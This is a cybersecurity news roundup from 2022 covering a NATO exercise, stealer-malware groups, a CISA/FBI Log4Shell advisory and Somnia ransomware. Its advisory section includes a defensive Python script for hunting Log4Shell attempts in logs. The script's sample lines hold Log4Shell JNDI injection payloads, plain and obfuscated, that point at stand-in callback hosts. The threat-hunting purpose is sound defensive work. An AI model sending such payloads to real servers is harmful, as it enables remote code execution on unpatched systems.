NATO held annual cyber defence exercise

Between 28 November and 2 December 2022, NATO held its Cyber Coalition 2022 cyber defence exercise with the goal of boosting member countries’ cyber resilience.

The exercise involved 1000 cyber defenders from 26 NATO allies, Finland, Sweden, Georgia, Ireland, Japan, Switzerland, and the EU, as well as experts from business and academia.

Cyber Coalition 2022 was also used to test and validate concepts, capture requirements, and explore disruptive technologies in support of military operators and commanders. It included experiments on the use of artificial intelligence to help counter cyber threats, on the standardisation of cyber messages to foster information sharing, and on the exploitation of cyber threat intelligence to inform cyberspace situational awareness.

Singapore-based Group-IB identified 34 Russian-speaking cybercrime groups

The Singapore-based cybersecurity company Group-IB has identified 34 Russian-speaking cybercrime groups distributing information-stealing malware under the stealer-as-a-service model. The groups use this type of malware to target users of services such as Steam, Roblox, and Amazon, harvesting credentials saved in browsers, bank card details, and cryptocurrency wallet data from infected computers and selling them on the dark web. Group-IB estimates that more than 890,000 devices in 111 countries were infected in the first seven months of 2022. The five most affected countries are the USA, Brazil, India, Germany, and Indonesia, and the estimated value of the stolen credentials is around USD 5.8 million.

CISA and FBI issue joint advisory on Iranian government-sponsored APT actors compromising federal network

In the USA, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued a joint cybersecurity advisory on an incident at a Federal Civilian Executive Branch (FCEB) organisation. Having assessed that the FCEB network was compromised by Iranian government-sponsored advanced persistent threat (APT) actors, the two agencies detailed the actors' tactics, techniques, and procedures. One of the findings was that the threat actors exploited the Log4Shell vulnerability (CVE-2021-44228) in an unpatched VMware Horizon server to gain initial access. Organisations with affected VMware systems that did not immediately apply the available patches or workarounds were therefore advised to assume compromise and initiate threat-hunting activities.
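One concrete piece of the threat hunting the advisory calls for is a retrospective sweep of web-tier logs for the Log4Shell lookup string, including the common obfuscated forms attackers used to slip past naive `${jndi:` greps. The script below is an added example written for this page; it is not code from CISA, the FBI, or VMware, and the log lines it scans are constructed (RFC 5737 documentation addresses, a made-up `evil.example` host) rather than taken from the incident. It assumes Apache/Nginx-style combined access logs with the client IP as the first field and the User-Agent as the last quoted field; VMware Horizon's own logs differ in format, so only the normalisation and matching logic carries over.

```python
"""Hunt for Log4Shell (CVE-2021-44228) lookup strings in web access logs.

Added example for this page, not code from the CISA/FBI advisory. Handles the
obfuscations most often seen in the wild: URL encoding (single and double),
``${lower:x}`` / ``${upper:x}`` wrappers and ``${anything:-x}`` default-value
tricks such as ``${::-j}``, all of which Log4j 2.x resolves before the lookup.
"""
import re
from typing import Dict, List, Set
from urllib.parse import unquote

# Constructed sample log lines (not real traffic from the advisory's incident).
SAMPLE_LOGS = [
    '203.0.113.5 - - [14/Nov/2022:08:01:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Nov/2022:08:01:14 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.9 - - [14/Nov/2022:08:02:03 +0000] "GET /x HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.7/x}"',
    '198.51.100.9 - - [14/Nov/2022:08:02:05 +0000] "GET /x HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/y}"',
    '192.0.2.8 - - [14/Nov/2022:08:03:00 +0000] "GET /login?u=%24%7Bjndi%3Adns%3A%2F%2Fevil.example%2Fz%7D HTTP/1.1" 200 100 "-" "curl/7.81"',
    '192.0.2.10 - - [14/Nov/2022:08:04:00 +0000] "GET /docs/lookup-syntax.html HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

# ${lower:j} / ${upper:j} -> j  (innermost only: the body may not contain $ or })
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}", re.IGNORECASE)
# ${::-j}, ${env:NOPE:-j} -> j  (innermost only, so an outer ${ is never swallowed)
_DEFAULT_VALUE = re.compile(r"\$\{[^}$]*?:-([^}$]*)\}")
# The resolved lookup we are hunting for, with its protocol (ldap, ldaps, rmi, dns, ...)
_JNDI = re.compile(r"\$\{jndi:([a-z]+):")
# Callback host of a resolved lookup, for pivoting and blocking
_JNDI_HOST = re.compile(r"\$\{jndi:[a-z]+://([^/:}\s]+)")


def normalise(line: str) -> str:
    """Undo URL encoding and nested Log4j lookups until the string is stable."""
    text = unquote(unquote(line))  # second pass catches double-encoded payloads
    previous = None
    while previous != text:  # every substitution shortens the string, so this terminates
        previous = text
        text = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text.lower()


def hunt(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per log line that carries a resolved ${jndi:...} lookup."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        norm = normalise(line)
        match = _JNDI.search(norm)
        if not match:
            continue
        end = norm.find("}", match.start())
        payload = norm[match.start(): end + 1 if end != -1 else None]
        hits.append({
            "line": number,
            "src": line.split(" ", 1)[0],  # client IP is the first field of a combined log
            "proto": match.group(1),
            "payload": payload,
        })
    return hits


def callback_hosts(lines: List[str]) -> Set[str]:
    """Distinct LDAP/RMI/DNS callback hosts, the first thing to pivot on in the hunt."""
    return {m.group(1) for line in lines for m in _JNDI_HOST.finditer(normalise(line))}


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOGS):
        print(f"line {hit['line']}: {hit['src']} -> {hit['proto']} {hit['payload']}")
    print("callback hosts:", sorted(callback_hosts(SAMPLE_LOGS)))
```

On the constructed sample the sweep flags four of the six lines (plain, case-wrapped, default-value and URL-encoded payloads) and two distinct callback hosts. Two caveats a practitioner should keep in mind: the lookup string can arrive in any header or parameter the application logs with Log4j, not just the ones your web tier records, so an empty result from this sweep is not evidence of non-compromise; and the script only finds the attempt, not whether it succeeded. For an unpatched Horizon server the advisory's guidance still applies: assume compromise and hunt for post-exploitation activity regardless of what the web logs show.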

New Somnia ransomware attacks target corporations in Ukraine

The Computer Emergency Response Team of Ukraine (CERT-UA) reported the spread of a new ransomware strain called 'Somnia', attributing the attacks to the Russian threat actor known as 'From Russia with Love' (FRwL), also known as 'Z-Team'. The attacks targeted employees of Ukrainian organisations, using the employees' Telegram accounts as a way into the corporate network.

As explained by CERT-UA, the group used fake websites that mimic the 'Advanced IP Scanner' software. The download infects the victim's computer with the Vidar information-stealing malware, which captures Telegram session data and lets the attackers take over the victim's account.

The threat actors then used the victims' Telegram accounts to gain access to the corporate network. Once inside, they carried out reconnaissance with tools such as Netscan and deployed Cobalt Strike Beacon before exfiltrating data.

According to CERT-UA, the group had previously announced on Telegram that it had created the Somnia ransomware, and had posted evidence of its attacks on Ukrainian targets there.

EU proposed actions to boost its cyber capabilities

The European Union has recently proposed a set of measures to help European armed forces move faster in times of conflict. The Action Plan on Military Mobility is intended to help European armed forces respond better to crises erupting at the EU's external borders and beyond, and it also aims to strengthen the resilience of the European transport infrastructure that military mobility depends on, including its protection against cyberattacks and the protection of critical infrastructure.